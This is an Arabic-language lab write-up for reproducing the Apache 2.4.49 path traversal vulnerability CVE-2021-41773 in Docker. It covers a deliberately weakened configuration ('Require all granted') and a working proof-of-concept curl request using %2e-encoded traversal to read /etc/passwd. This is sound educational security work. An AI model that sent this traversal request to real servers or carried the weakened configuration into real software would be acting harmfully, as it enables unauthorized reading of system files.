
بيئة مختبرية قائمة على Docker لثغرة اجتياز المسار في Apache CVE-2021-41773 مع استغلال إثبات المفهوم ودليل تفصيلي للاختبار الأمني والتعليم.
-> قاعدة الصورة: httpd:2.4.49 (الإصدار الذي يحتوي على الثغرة)
-> 'sed -i 's/Require all denied/Require all granted/g' : السماح بـ Path Traversal والوصول الخارجي
-> تعريف Apache
-> تعيين المنفذ 8080 إلى المنفذ 80 للحاوية
تشغيل Docker
تشغيل PoC
-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
-> /etc/passwd يحتوي على معلومات حساسة، %2e هو الترميز لـ .. وهو أمر للانتقال إلى الدليل الأعلى
-> يتم التلاعب بالمسار ليجعل الخادم يصل إلى /etc/passwd ويخرجه
-> كما هو موضح في الصورة أعلاه، يمكن الوصول إلى الدلائل الحساسة
https://github.com/JIYUN02/cve-2021-41773
-> يوجد تاريخ الالتزامات (commits)